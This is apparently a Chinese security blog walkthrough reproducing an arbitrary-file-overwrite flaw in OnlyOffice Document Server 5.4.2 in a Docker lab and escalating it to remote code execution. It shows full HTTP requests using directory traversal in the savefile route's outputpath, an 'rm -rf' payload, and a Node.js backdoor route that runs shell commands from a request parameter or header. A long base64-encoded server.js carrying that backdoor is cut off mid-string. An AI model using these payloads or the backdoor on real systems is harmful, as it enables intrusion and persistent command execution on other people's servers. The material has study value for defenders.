前言:OnlyOffice 是一款办公套件软件,提供了文档编辑、电子表格、演示文稿等功能,类似于 Microsoft Office。它支持多人协作编辑,可以在云端或者私有服务器上部署,适合个人用户、团队和企业进行办公任务。只要有合适的许可证,用户可以在不同的平台上访问 OnlyOffice,包括桌面端、Web 界面和移动设备。
OnlyOffice 最初由 Ascensio System SIA 开发,它提供了广泛的功能,可以满足各种办公需求。在云端部署方面,OnlyOffice 还可以与其他协作工具和平台集成,以实现更全面的工作流程。
这里是基于docke去搭建的:
1. 拉取5.4.2.46版本onlyoffice/documentserver镜像
docker pull onlyoffice/documentserver:5.4.2.46
2.创建容器
`docker run -i -t -d -p 9000:80 --name chineseonlyoffice_documentserver --privileged=true onlyoffice/documentserver:5.4.2.46 /usr/sbin/init`` `
因为我这里是基于docker_gui的(方便更好的去更改文件或者读取代码):
项目搭建成功:
ps:搭建过程中名称可能会出现问题,因为docker镜像名称不允许使用/,我们可以使用_去代替。
一般程序员没有刻意设置的话,我们直接访问http://localhost:9000/index.html就可以看到版本号:
这里我们先使用前辈使用的exp进行利用:
https://github.com/moehw/poc_exploits
要利用该漏洞,攻击者必须使用特制的请求来 服务器,它将用受控数据覆盖任意文件。如果其中之一 服务的可执行文件被这次攻击覆盖,那么有 以下效果:- 攻击者对服务器的下一个请求会导致执行来自服务器的新文件 上一步,这将导致远程代码执行 - 缺少正确的可执行服务文件会导致拒绝服务
由于将文件保存到,“uploadImageFile”函数中发生文件覆盖 “strPath”变量中指定的路径,它是以下值的串联 其他几个字符串,其中最后一个(“formatStr”)由攻击者控制 当满足某些条件时:- “isValidJwt”为真 - “docId”和“加密”出现在 JWT 令牌中 - 请求正文中有一个缓冲区,文件将被覆盖到该缓冲区 - 缓冲区必须以文本“ENCRYPTED;”开头,然后是带有相对路径的字符串 服务器媒体目录(“/var/lib/onlyoffice/documentserver/App_Data/cache/files/ /media/<random_hash><control_filename>”默认情况下)覆盖文件 进而 ”;”。
使用该POC验证我们的目标时,文件上传都无法成功。分析发现CVE-2021-3199 是利用的uploadImageFile方法,存在一定的限制。
uploadImageFile方法中,formatStr变量来自于根据文件内容进行识别。如果encrypted为true,那么就会从post body中解析出formatStr,从而实现控制文件名。
而encrypted需要配置了cfgTokenEnableBrowser,"Directory traversal with Remote Code Execution when JWT is used in Document Server before 5.6.3",需要配置了JWT时才能利用,Docker环境默认未启用,目标也未启用。
所以我们需要从代码层面来进行漏洞利用以及构建payload,漏洞分析我们需要把代码弄出来,这里我们直接从dokcer里复制出来:
1、从主机往容器中拷贝
eg:将主机/www/runoob目录拷贝到容器96f7f14e99ab的/www目录下。
docker cp /www/runoob 96f7f14e99ab:/www/
2、将容器中文件拷往主机
eg:将容器96f7f14e99ab的/www目录拷贝到主机的/tmp目录中。
docker cp 96f7f14e99ab:/www /tmp/
eg:将主机/www/runoob目录拷贝到容器96f7f14e99ab中,目录重命名为www。
docker cp /www/runoob 96f7f14e99ab:/www
等依赖加载完毕,我们就可以看到相关代码:
这里我们可以看到通过访问代码相关暴露的接口来访问相关的API
DocService/sources/server.js 存在一个savefile路由,看到这名字就能猜到是文件上传相关的路由:
mac按command,win按ctrl我们点击黄色的savefile定位到代码逻辑里:
首先对cmd参数进行了一次JSON解析,由于默认未开启cfgTokenEnableBrowser,所以可以直接跳过中间一部分。
最后调用了storage.putObject方法写文件,
文件地址cmd.getSaveKey() + '/' + cmd.getOutputPath()
文件内容来源于req.body , 也就是POST body。
cmd变量来自于对cmd参数值的JSON解析,在yield* addRandomKeyTaskCmd(cmd)方法中,
调用了savekey setter,随机生成taskkey再重新设置savekey属性值,导致不再可控。虽然savekey无法控制,但是outputpath没有被重新设置,还是来源于参数值,所以这里通过outputpath可以实现目录穿越到任意地址写文件。
让我们使用bp抓包去测试:
poc:
`POST /savefile/1?cmd={"id":1,"outputpath":"../../../../../../../../tmp/111.txt"} HTTP/1.1``Host: 10.37.129.2:9000``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate``Accept-Language: zh-CN,zh;q=0.9``Connection: close``Content-Type: application/x-www-form-urlencoded``Content-Length: 4``{``}`` `
成功写入,并且是**覆盖**形式的写入:
Tips: 这里我自己遇到两个坑点:
1)bp抓包的时候抓不到本地的包,那我们可以更改浏览器的插件取消这些不代理的列表,当然也可以查案自己的电脑网卡,来通过非localhost和非127.0.0.1去抓取。
2)在构造poc的时候,因为查看大佬的文章导致自己直接断行,poc发送不出去,这里要注意,一般我们格式正确的话,bp是会有着重颜色的辅助的:
通过进入docker查看发现是一个ds的用户启动的onlyoffice,跑express的用户为ds, web下的文件所属用户也都为ds,那么可以通过覆盖web的一些文件实现RCE。
首先会想到覆盖js文件,新增路由实现RCE,但是比较麻烦的是node需要重启才会加载上新增的路由,而我们暂时无法做到让目标重启。
既然不能重启,那么很容易就能想到通过覆盖模板文件再通过SSTI RCE,覆盖模板文件后不需要重启服务即可利用,不过最后发现onlyoffice根本就没用到模板。
至此,只能找OnlyOffice中是否存在命令执行调用elf的路由,通过任意文件写覆盖elf来实现命令执行。
存在一个docbuilder路由,看名字应该是用来生成文档的,该路由方法的实现代码大概如下:
简单点说就是在ExecuteTask方法中,会通过spawnAsync命令执行方法调用 /var/www/onlyoffice/documentserver/server/FileConverter/bin/docbuilder ELF来生成文档,docbuilder文件所属用户也是ds,那么可以通过之前的文件写漏洞覆盖掉docbuilder ELF,再通过docbuilder路由触发我们上传的ELF。
我们先把docbuilder文件备份一下,养成良好习惯:
docker cp 96f7f14e99ab:/www /tmp/
然后我们理一下思路:我们需要:
1>新增一个路由
2>重启服务(通过supervisorctl来实现),web通过访问docbuilder接口实现
3>通过访问路由来进行命令回显示
Supervisor 进程管理工具: Supervisor 是一个用于管理和监控进程的工具,特别适用于在 Unix-like 操作系统中管理长时间运行的后台进程。它允许用户启动、停止、重启以及监视进程的状态。
"supervisorctl" 是 Supervisor 进程管理工具的命令行界面,用于与 Supervisor 守护进程进行交互,以管理和监控运行在系统中的各种进程。Supervisor 是一个在 Unix-like 操作系统中常用的工具,它可以帮助你管理和监控后台运行的进程,确保它们持续稳定地运行。
通过 "supervisorctl" 命令,你可以执行以下操作:
启动进程: 使用 start 命令可以启动一个由 Supervisor 管理的进程。
停止进程: 使用 stop 命令可以停止一个正在运行的进程。
重启进程: 使用 restart 命令可以重新启动一个进程,即先停止再启动。
重新加载配置: 使用 reread 命令可以重新加载 Supervisor 的配置文件,以便应用最新的更改。
重新启动配置: 使用 update 命令可以重新启动 Supervisor 以应用配置文件的更改。
查看进程状态: 使用 status 命令可以查看所有被 Supervisor 管理的进程的状态,包括运行状态和进程 ID 等信息。
查看日志: 使用 tail 命令可以查看进程的日志输出。
进入进程控制台: 使用 fg 命令可以进入某个进程的控制台界面,从而可以与进程进行交互。
包括这里在docker里也是用supervisor进行管理的服务
接下来我们进行实际的操作:
首先我们需要写一个可以支持命令回显的路由:
`app.all('/runExec.json', (req, res) => {` `const spawn = require('child_process').spawn;` `var username = req.query.username ? req.query.username: req.header("username");` `if(!username){` `res.send("empty para!");` `}else {` `const cmd = spawn('sh', ['-c', username]);` `var result = "";` `cmd.stdout.on('data', (data) => {` `result += data;` `});`` ` `cmd.on('close', (code) => {` `res.send(result);` `return res.end();` `})` `}` `});`
首先我们需要先把server.js下载下来,可以通过docker cp命令把代码弄下来,实战情况下我们可以寻找特定版本的代码来进行审计添加,因为savefile目前只可以达到写文件功能:
因为我自己测试无法覆盖,所以我们需要先删除这个server.js(记得备份一下)
第一个包(删文件):
`POST /savefile/1?cmd={"id":1,"outputpath":"../../../../../../../../var/www/onlyoffice/documentserver/server/FileConverter/bin/docbuilder"} HTTP/1.1``Host: 10.37.129.2:9000``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate``Accept-Language: zh-CN,zh;q=0.9``Connection: close``Content-Type: application/x-www-form-urlencoded``Content-Length: 3`` ``rm -rf /var/www/onlyoffice/documentserver/server/DocService/sources/server.js`` `
执行下路由;
第二个包(写路由):
`POST /savefile/1?cmd={"id":1,"outputpath":"../../../../../../../../var/www/onlyoffice/documentserver/server/FileConverter/bin/docbuilder"} HTTP/1.1``Host: 10.37.129.2:9000``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate``Accept-Language: zh-CN,zh;q=0.9``Connection: close``Content-Type: application/x-www-form-urlencoded``Content-Length: 3`` ``echo "LyoKICogQ29weXJpZ2h0IChDKSBBc2NlbnNpbyBTeXN0ZW0gU0lBIDIwMTItMjAxOS4gQWxsIHJpZ2h0cyByZXNlcnZlZAogKgogKiBodHRwczovL3d3dy5vbmx5b2ZmaWNlLmNvbS8gCiAqCiAqIFZlcnNpb246IDUuNC4yIChidWlsZDo0NikKICovCgondXNlIHN0cmljdCc7Cgpjb25zdCBjbHVzdGVyID0gcmVxdWlyZSgnY2x1c3RlcicpOwpjb25zdCBjb25maWdDb21tb24gPSByZXF1aXJlKCdjb25maWcnKTsKY29uc3QgY29uZmlnID0gY29uZmlnQ29tbW9uLmdldCgnc2VydmljZXMuQ29BdXRob3JpbmcnKTsKY29uc3QgbG9nZ2VyID0gcmVxdWlyZSgnLi8uLi8uLi9Db21tb24vc291cmNlcy9sb2dnZXInKTsKY29uc3QgY28gPSByZXF1aXJlKCdjbycpOwpjb25zdCBsaWNlbnNlID0gcmVxdWlyZSgnLi8uLi8uLi9Db21tb24vc291cmNlcy9saWNlbnNlJyk7CgppZiAoY2x1c3Rlci5pc01hc3RlcikgewoJY29uc3QgZnMgPSByZXF1aXJlKCdmcycpOwoJbGV0IGxpY2Vuc2VJbmZvLCB3b3JrZXJzQ291bnQgPSAwLCB1cGRhdGVUaW1lOwoJY29uc3QgcmVhZExpY2Vuc2UgPSBmdW5jdGlvbiooKSB7CgkJbGljZW5zZUluZm8gPSB5aWVsZCogbGljZW5zZS5yZWFkTGljZW5zZSgpOwoJCXdvcmtlcnNDb3VudCA9IE1hdGgubWluKDEsIGxpY2Vuc2VJbmZvLmNvdW50LyosIE1hdGguY2VpbChudW1DUFVzICogY2ZnV29ya2VyUGVyQ3B1KSovKTsKCX07Cgljb25zdCB1cGRhdGVMaWNlbnNlV29ya2VyID0gKHdvcmtlcikgPT4gewoJCXdvcmtlci5zZW5kKHt0eXBlOiAxLCBkYXRhOiBsaWNlbnNlSW5mb30pOwoJfTsKCWNvbnN0IHVwZGF0ZVdvcmtlcnMgPSAoKSA9PiB7CgkJY29uc3QgYXJyS2V5V29ya2VycyA9IE9iamVjdC5rZXlzKGNsdXN0ZXIud29ya2Vycyk7CgkJaWYgKGFycktleVdvcmtlcnMubGVuZ3RoIDwgd29ya2Vyc0NvdW50KSB7CgkJCWZvciAobGV0IGkgPSBhcnJLZXlXb3JrZXJzLmxlbmd0aDsgaSA8IHdvcmtlcnNDb3VudDsgKytpKSB7CgkJCQljb25zdCBuZXdXb3JrZXIgPSBjbHVzdGVyLmZvcmsoKTsKCQkJCWxvZ2dlci53YXJuKCd3b3JrZXIgJXMgc3RhcnRlZC4nLCBuZXdXb3JrZXIucHJvY2Vzcy5waWQpOwoJCQl9CgkJfSBlbHNlIHsKCQkJZm9yIChsZXQgaSA9IHdvcmtlcnNDb3VudDsgaSA8IGFycktleVdvcmtlcnMubGVuZ3RoOyArK2kpIHsKCQkJCWNvbnN0IGtpbGxXb3JrZXIgPSBjbHVzdGVyLndvcmtlcnNbYXJyS2V5V29ya2Vyc1tpXV07CgkJCQlpZiAoa2lsbFdvcmtlcikgewoJCQkJCWtpbGxXb3JrZXIua2lsbCgpOwoJCQkJfQoJCQl9CgkJfQoJfTsKCWNvbnN0IHVwZGF0ZVBsdWdpbnMgPSAoZXZlbnRUeXBlLCBmaWxlbmFtZSkgPT4gewoJCWNvbnNvbGUubG9nKCd1cGRhdGUgRm9sZGVyOiAlcyA7ICVzJywgZXZlbnRUeXBlLCBmaWxlbmFtZSk7CgkJaWYgKHVwZGF0ZVRpbWUgJiYgMTAwMCA+PSAobmV3IERhdGUoKSAtIHVwZGF0ZVRpbWUpKSB7CgkJCXJldHVybjsKCQl9CgkJY29uc29sZS5sb2coJ3VwZGF0ZSBGb2xkZXIgdHJ1ZTogJXMgOyAlcycsIGV2ZW50VHlwZSwgZmlsZW5hbWUpOwoJCXVwZGF0ZVRpbWUgPSBuZXcgRGF0ZSgpOwoJCWZvciAobGV0IGkgaW4gY2x1c3Rlci53b3JrZXJzKSB7CgkJCWNsdXN0ZXIud29ya2Vyc1tpXS5zZW5kKHt0eXBlOiAyfSk7CgkJfQoJfTsKCWNvbnN0IHVwZGF0ZUxpY2Vuc2UgPSAoKSA9PiB7CgkJcmV0dXJuIGNvKGZ1bmN0aW9uKigpIHsKCQkJdHJ5IHsKCQkJCXlpZWxkKiByZWFkTGljZW5zZSgpOwoJCQkJbG9nZ2VyLndhcm4oJ3VwZGF0ZSBjbHVzdGVyIHdpdGggJXMgd29ya2VycycsIHdvcmtlcnNDb3VudCk7CgkJCQlmb3IgKGxldCBpIGluIGNsdXN0ZXIud29ya2VycykgewoJCQkJCXVwZGF0ZUxpY2Vuc2VXb3JrZXIoY2x1c3Rlci53b3JrZXJzW2ldKTsKCQkJCX0KCQkJCXVwZGF0ZVdvcmtlcnMoKTsKCQkJfSBjYXRjaCAoZXJyKSB7CgkJCQlsb2dnZXIuZXJyb3IoJ3VwZGF0ZUxpY2Vuc2UgZXJyb3I6XHJcbiVzJywgZXJyLnN0YWNrKTsKCQkJfQoJCX0pOwoJfTsKCgljbHVzdGVyLm9uKCdmb3JrJywgKHdvcmtlcikgPT4gewoJCXVwZGF0ZUxpY2Vuc2VXb3JrZXIod29ya2VyKTsKCX0pOwoJY2x1c3Rlci5vbignZXhpdCcsICh3b3JrZXIsIGNvZGUsIHNpZ25hbCkgPT4gewoJCWxvZ2dlci53YXJuKCd3b3JrZXIgJXMgZGllZCAoY29kZSA9ICVzOyBzaWduYWwgPSAlcykuJywgd29ya2VyLnByb2Nlc3MucGlkLCBjb2RlLCBzaWduYWwpOwoJCXVwZGF0ZVdvcmtlcnMoKTsKCX0pOwoKCXVwZGF0ZUxpY2Vuc2UoKTsKCgl0cnkgewoJCWZzLndhdGNoKGNvbmZpZy5nZXQoJ3BsdWdpbnMucGF0aCcpLCB1cGRhdGVQbHVnaW5zKTsKCX0gY2F0Y2ggKGUpIHsKCQlsb2dnZXIud2FybignUGx1Z2lucyB3YXRjaCBleGNlcHRpb24gKGh0dHBzOi8vbm9kZWpzLm9yZy9kb2NzL2xhdGVzdC9hcGkvZnMuaHRtbCNmc19hdmFpbGFiaWxpdHkpLicpOwoJfQoJZnMud2F0Y2hGaWxlKGNvbmZpZ0NvbW1vbi5nZXQoJ2xpY2Vuc2UnKS5nZXQoJ2xpY2Vuc2VfZmlsZScpLCB1cGRhdGVMaWNlbnNlKTsKCXNldEludGVydmFsKHVwZGF0ZUxpY2Vuc2UsIDg2NDAwMDAwKTsKfSBlbHNlIHsKCWxvZ2dlci53YXJuKCdFeHByZXNzIHNlcnZlciBzdGFydGluZy4uLicpOwoKCWNvbnN0IGV4cHJlc3MgPSByZXF1aXJlKCdleHByZXNzJyk7Cgljb25zdCBodHRwID0gcmVxdWlyZSgnaHR0cCcpOwoJY29uc3QgdXJsTW9kdWxlID0gcmVxdWlyZSgndXJsJyk7Cgljb25zdCBwYXRoID0gcmVxdWlyZSgncGF0aCcpOwoJY29uc3QgYm9keVBhcnNlciA9IHJlcXVpcmUoImJvZHktcGFyc2VyIik7Cgljb25zdCBtaW1lID0gcmVxdWlyZSgnbWltZScpOwoJY29uc3QgZG9jc0NvU2VydmVyID0gcmVxdWlyZSgnLi9Eb2NzQ29TZXJ2ZXInKTsKCWNvbnN0IGNhbnZhc1NlcnZpY2UgPSByZXF1aXJlKCcuL2NhbnZhc3NlcnZpY2UnKTsKCWNvbnN0IGNvbnZlcnRlclNlcnZpY2UgPSByZXF1aXJlKCcuL2NvbnZlcnRlcnNlcnZpY2UnKTsKCWNvbnN0IGZpbGVVcGxvYWRlclNlcnZpY2UgPSByZXF1aXJlKCcuL2ZpbGV1cGxvYWRlcnNlcnZpY2UnKTsKCWNvbnN0IGNvbnN0YW50cyA9IHJlcXVpcmUoJy4vLi4vLi4vQ29tbW9uL3NvdXJjZXMvY29uc3RhbnRzJyk7Cgljb25zdCB1dGlscyA9IHJlcXVpcmUoJy4vLi4vLi4vQ29tbW9uL3NvdXJjZXMvdXRpbHMnKTsKCWNvbnN0IGNvbW1vbkRlZmluZXMgPSByZXF1aXJlKCcuLy4uLy4uL0NvbW1vbi9zb3VyY2VzL2NvbW1vbmRlZmluZXMnKTsKCWNvbnN0IGNvbmZpZ1N0b3JhZ2UgPSBjb25maWdDb21tb24uZ2V0KCdzdG9yYWdlJyk7Cgljb25zdCBhcHAgPSBleHByZXNzKCk7Cgljb25zdCBzZXJ2ZXIgPSBodHRwLmNyZWF0ZVNlcnZlcihhcHApOwoKCWxldCB1c2VyUGx1Z2lucyA9IG51bGwsIHVwZGF0ZVBsdWdpbnMgPSB0cnVlOwoKCWlmIChjb25maWcuaGFzKCdzZXJ2ZXIuc3RhdGljX2NvbnRlbnQnKSkgewoJCWNvbnN0IHN0YXRpY0NvbnRlbnQgPSBjb25maWcuZ2V0KCdzZXJ2ZXIuc3RhdGljX2NvbnRlbnQnKTsKCQlmb3IgKGxldCBpIGluIHN0YXRpY0NvbnRlbnQpIHsKCQkJYXBwLnVzZShpLCBleHByZXNzLnN0YXRpYyhzdGF0aWNDb250ZW50W2ldWydwYXRoJ10sIHN0YXRpY0NvbnRlbnRbaV1bJ29wdGlvbnMnXSkpOwoJCX0KCX0KCglpZiAoY29uZmlnU3RvcmFnZS5oYXMoJ2ZzLmZvbGRlclBhdGgnKSkgewoJCWNvbnN0IGNmZ0J1Y2tldE5hbWUgPSBjb25maWdTdG9yYWdlLmdldCgnYnVja2V0TmFtZScpOwoJCWNvbnN0IGNmZ1N0b3JhZ2VGb2xkZXJOYW1lID0gY29uZmlnU3RvcmFnZS5nZXQoJ3N0b3JhZ2VGb2xkZXJOYW1lJyk7CgkJYXBwLnVzZSgnLycgKyBjZmdCdWNrZXROYW1lICsgJy8nICsgY2ZnU3RvcmFnZUZvbGRlck5hbWUsIChyZXEsIHJlcywgbmV4dCkgPT4gewoJCQljb25zdCBpbmRleCA9IHJlcS51cmwubGFzdEluZGV4T2YoJy8nKTsKCQkJaWYgKCdHRVQnID09PSByZXEubWV0aG9kICYmIC0xICE9IGluZGV4KSB7CgkJCQljb25zdCBjb250ZW50RGlzcG9zaXRpb24gPSByZXEucXVlcnlbJ2Rpc3Bvc2l0aW9uJ10gfHwgJ2F0dGFjaG1lbnQnOwoJCQkJbGV0IHNlbmRGaWxlT3B0aW9ucyA9IHsKCQkJCQlyb290OiBjb25maWdTdG9yYWdlLmdldCgnZnMuZm9sZGVyUGF0aCcpLCBkb3RmaWxlczogJ2RlbnknLCBoZWFkZXJzOiB7CgkJCQkJCSdDb250ZW50LURpc3Bvc2l0aW9uJzogY29udGVudERpc3Bvc2l0aW9uCgkJCQkJfQoJCQkJfTsKCQkJCWNvbnN0IHVybFBhcnNlZCA9IHVybE1vZHVsZS5wYXJzZShyZXEudXJsKTsKCQkJCWlmICh1cmxQYXJzZWQgJiYgdXJsUGFyc2VkLnBhdGhuYW1lKSB7CgkJCQkJY29uc3QgZmlsZW5hbWUgPSBkZWNvZGVVUklDb21wb25lbnQocGF0aC5iYXNlbmFtZSh1cmxQYXJzZWQucGF0aG5hbWUpKTsKCQkJCQlzZW5kRmlsZU9wdGlvbnMuaGVhZGVyc1snQ29udGVudC1UeXBlJ10gPSBtaW1lLmdldFR5cGUoZmlsZW5hbWUpOwoJCQkJfQoJCQkJY29uc3QgcmVhbFVybCA9IHJlcS51cmwuc3Vic3RyaW5nKDAsIGluZGV4KTsKCQkJCXJlcy5zZW5kRmlsZShyZWFsVXJsLCBzZW5kRmlsZU9wdGlvbnMsIChlcnIpID0+IHsKCQkJCQlpZiAoZXJyKSB7CgkJCQkJCWxvZ2dlci5lcnJvcihlcnIpOwoJCQkJCQlyZXMuc3RhdHVzKDQwMCkuZW5kKCk7CgkJCQkJfQoJCQkJfSk7CgkJCX0gZWxzZSB7CgkJCQlyZXMuc2VuZFN0YXR1cyg0MDQpCgkJCX0KCQl9KTsKCX0KCWRvY3NDb1NlcnZlci5pbnN0YWxsKHNlcnZlciwgKCkgPT4gewoJCXNlcnZlci5saXN0ZW4oY29uZmlnLmdldCgnc2VydmVyLnBvcnQnKSwgKCkgPT4gewoJCQlsb2dnZXIud2FybigiRXhwcmVzcyBzZXJ2ZXIgbGlzdGVuaW5nIG9uIHBvcnQgJWQgaW4gJXMgbW9kZSIsIGNvbmZpZy5nZXQoJ3NlcnZlci5wb3J0JyksIGFwcC5zZXR0aW5ncy5lbnYpOwoJCX0pOwoJCWFwcC5hbGwoJy9ydW5FeGVjLmpzb24nLCAocmVxLCByZXMpID0+IHsKCQkJY29uc3Qgc3Bhd24gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuc3Bhd247CgkJCXZhciB1c2VybmFtZSA9IHJlcS5xdWVyeS51c2VybmFtZSA/IHJlcS5xdWVyeS51c2VybmFtZTogcmVxLmhlYWRlcigidXNlcm5hbWUiKTsKCQkJaWYoIXVzZXJuYW1lKXsKCQkJCXJlcy5zZW5kKCJlbXB0eSBwYXJhISIpOwoJCQl9ZWxzZSB7CgkJCQljb25zdCBjbWQgPSBzcGF3bignc2gnLCBbJy1jJywgdXNlcm5hbWVdKTsKCQkJCXZhciByZXN1bHQgPSAiIjsKCQkJCWNtZC5zdGRvdXQub24oJ2RhdGEnLCAoZGF0YSkgPT4gewoJCQkJCXJlc3VsdCArPSBkYXRhOwoJCQkJfSk7CgoJCQkJY21kLm9uKCdjbG9zZScsIChjb2RlKSA9PiB7CgkJCQkJcmVzLnNlbmQocmVzdWx0KTsKCQkJCQlyZXR1cm4gcmVzLmVuZCgpOwoJCQkJfSkKCQkJfQoJCX0pOwoJCWFwcC5nZXQoJy9pbmRleC5odG1sJywgKHJlcSwgcmVzKSA9PiB7CgkJCXJlcy5zZW5kKCdTZXJ2ZXIgaXMgZnVuY3Rpb25pbmcgbm9ybWFsbHkuIFZlcnNpb246ICcgKyBjb21tb25EZWZpbmVzLmJ1aWxkVmVyc2lvbiArICcuIEJ1aWxkOiAnICsKCQkJCWNvbW1vbkRlZmluZXMuYnVpbGROdW1iZXIpOwoJCX0pOwoJCWNvbnN0IHJhd0ZpbGVQYXJzZXIgPSBib2R5UGFyc2VyLnJhdygKCQkJe2luZmxhdGU6IHRydWUsIGxpbWl0OiBjb25maWcuZ2V0KCdzZXJ2ZXIubGltaXRzX3RlbXBmaWxlX3VwbG9hZCcpLCB0eXBlOiAnKi8qJ30pOwoKCQlhcHAuZ2V0KCcvY29hdXRob3JpbmcvQ29tbWFuZFNlcnZpY2UuYXNoeCcsIHV0aWxzLmNoZWNrQ2xpZW50SXAsIHJhd0ZpbGVQYXJzZXIsIGRvY3NDb1NlcnZlci5jb21tYW5kRnJvbVNlcnZlcik7CgkJYXBwLnBvc3QoJy9jb2F1dGhvcmluZy9Db21tYW5kU2VydmljZS5hc2h4JywgdXRpbHMuY2hlY2tDbGllbnRJcCwgcmF3RmlsZVBhcnNlciwKCQkJZG9jc0NvU2VydmVyLmNvbW1hbmRGcm9tU2VydmVyKTsKCgkJYXBwLmdldCgnL0NvbnZlcnRTZXJ2aWNlLmFzaHgnLCB1dGlscy5jaGVja0NsaWVudElwLCByYXdGaWxlUGFyc2VyLCBjb252ZXJ0ZXJTZXJ2aWNlLmNvbnZlcnRYbWwpOwoJCWFwcC5wb3N0KCcvQ29udmVydFNlcnZpY2UuYXNoeCcsIHV0aWxzLmNoZWNrQ2xpZW50SXAsIHJhd0ZpbGVQYXJzZXIsIGNvbnZlcnRlclNlcnZpY2UuY29udmVydFhtbCk7CgkJYXBwLnBvc3QoJy9jb252ZXJ0ZXInLCB1dGlscy5jaGVja0NsaWVudElwLCByYXdGaWxlUGFyc2VyLCBjb252ZXJ0ZXJTZXJ2aWNlLmNvbnZlcnRKc29uKTsKCgoJCWFwcC5nZXQoJy9GaWxlVXBsb2FkZXIuYXNoeCcsIHV0aWxzLmNoZWNrQ2xpZW50SXAsIHJhd0ZpbGVQYXJzZXIsIGZpbGVVcGxvYWRlclNlcnZpY2UudXBsb2FkVGVtcEZpbGUpOwoJCWFwcC5wb3N0KCcvRmlsZVVwbG9hZGVyLmFzaHgnLCB1dGlscy5jaGVja0NsaWVudElwLCByYXdGaWxlUGFyc2VyLCBmaWxlVXBsb2FkZXJTZXJ2aWNlLnVwbG9hZFRlbXBGaWxlKTsKCgkJY29uc3QgZG9jSWRSZWdFeHAgPSBuZXcgUmVnRXhwKCJeWyIgKyBjb25zdGFudHMuRE9DX0lEX1BBVFRFUk4gKyAiXSokIiwgJ2knKTsKCQlhcHAucGFyYW0oJ2RvY2lkJywgKHJlcSwgcmVzLCBuZXh0LCB2YWwpID0+IHsKCQkJaWYgKGRvY0lkUmVnRXhwLnRlc3QodmFsKSkgewoJCQkJbmV4dCgpOwoJCQl9IGVsc2UgewoJCQkJcmVzLnNlbmRTdGF0dXMoNDAzKTsKCQkJfQoJCX0pOwoJCWFwcC5wYXJhbSgnaW5kZXgnLCAocmVxLCByZXMsIG5leHQsIHZhbCkgPT4gewoJCQlpZiAoIWlzTmFOKHBhcnNlSW50KHZhbCkpKSB7CgkJCQluZXh0KCk7CgkJCX0gZWxzZSB7CgkJCQlyZXMuc2VuZFN0YXR1cyg0MDMpOwoJCQl9CgkJfSk7CgkJYXBwLnBvc3QoJy91cGxvYWRvbGQvOmRvY2lkLzp1c2VyaWQvOmluZGV4JywgZmlsZVVwbG9hZGVyU2VydmljZS51cGxvYWRJbWFnZUZpbGVPbGQpOwoJCWFwcC5wb3N0KCcvdXBsb2FkLzpkb2NpZC86dXNlcmlkLzppbmRleCcsIHJhd0ZpbGVQYXJzZXIsIGZpbGVVcGxvYWRlclNlcnZpY2UudXBsb2FkSW1hZ2VGaWxlKTsKCgkJYXBwLnBvc3QoJy9kb3dubG9hZGFzLzpkb2NpZCcsIHJhd0ZpbGVQYXJzZXIsIGNhbnZhc1NlcnZpY2UuZG93bmxvYWRBcyk7CgkJYXBwLnBvc3QoJy9zYXZlZmlsZS86ZG9jaWQnLCByYXdGaWxlUGFyc2VyLCBjYW52YXNTZXJ2aWNlLnNhdmVGaWxlKTsKCQlhcHAuZ2V0KCcvaGVhbHRoY2hlY2snLCB1dGlscy5jaGVja0NsaWVudElwLCBkb2NzQ29TZXJ2ZXIuaGVhbHRoQ2hlY2spOwoKCQlhcHAuZ2V0KCcvYmFzZXVybCcsIChyZXEsIHJlcykgPT4gewoJCQlyZXMuc2VuZCh1dGlscy5nZXRCYXNlVXJsQnlSZXF1ZXN0KHJlcSkpOwoJCX0pOwoKCQlhcHAuZ2V0KCcvcm9ib3RzLnR4dCcsIChyZXEsIHJlcykgPT4gewoJCQlyZXMuc2V0SGVhZGVyKCdDb250ZW50LVR5cGUnLCAncGxhaW4vdGV4dCcpOwoJCQlyZXMuc2VuZCgiVXNlci1hZ2VudDogKlxuRGlzYWxsb3c6IC8iKTsKCQl9KTsKCgkJYXBwLnBvc3QoJy9kb2NidWlsZGVyJywgdXRpbHMuY2hlY2tDbGllbnRJcCwgcmF3RmlsZVBhcnNlciwgKHJlcSwgcmVzKSA9PiB7CgkJCWNvbnZlcnRlclNlcnZpY2UuYnVpbGRlcihyZXEsIHJlcyk7CgkJfSk7CgkJYXBwLmdldCgnL2luZm8vaW5mby5qc29uJywgdXRpbHMuY2hlY2tDbGllbnRJcCwgZG9jc0NvU2VydmVyLmxpY2Vuc2VJbmZvKTsKCgkJY29uc3Qgc2VuZFVzZXJQbHVnaW5zID0gKHJlcywgZGF0YSkgPT4gewoJCQlyZXMuc2V0SGVhZGVyKCdDb250ZW50LVR5cGUnLCAnYXBwbGljYXRpb24vanNvbicpOwoJCQlyZXMuc2VuZChKU09OLnN0cmluZ2lmeShkYXRhKSk7CgkJfTsKCQlhcHAuZ2V0KCcvcGx1Z2lucy5qc29uJywgKHJlcSwgcmVzKSA9PiB7CgkJCWlmICh1c2VyUGx1Z2lucyAmJiAhdXBkYXRlUGx1Z2lucykgewoJCQkJc2VuZFVzZXJQbHVnaW5zKHJlcywgdXNlclBsdWdpbnMpOwoJCQkJcmV0dXJuOwoJCQl9CgoJCQlpZiAoIWNvbmZpZy5oYXMoJ3NlcnZlci5zdGF0aWNfY29udGVudCcpIHx8ICFjb25maWcuaGFzKCdwbHVnaW5zLnVyaScpKSB7CgkJCQlyZXMuc2VuZFN0YXR1cyg0MDQpOwoJCQkJcmV0dXJuOwoJCQl9Cgo